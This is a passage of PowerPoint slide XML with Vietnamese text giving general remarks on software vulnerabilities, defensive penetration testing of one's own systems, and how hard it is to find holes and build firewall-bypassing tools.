            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tùy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiếm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dễ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chẳng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tốt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>luôn</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nhiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhằm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trước</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>viết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhằm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lửa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</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là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tạp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đòi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hỏi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sâu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rộng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</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kiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
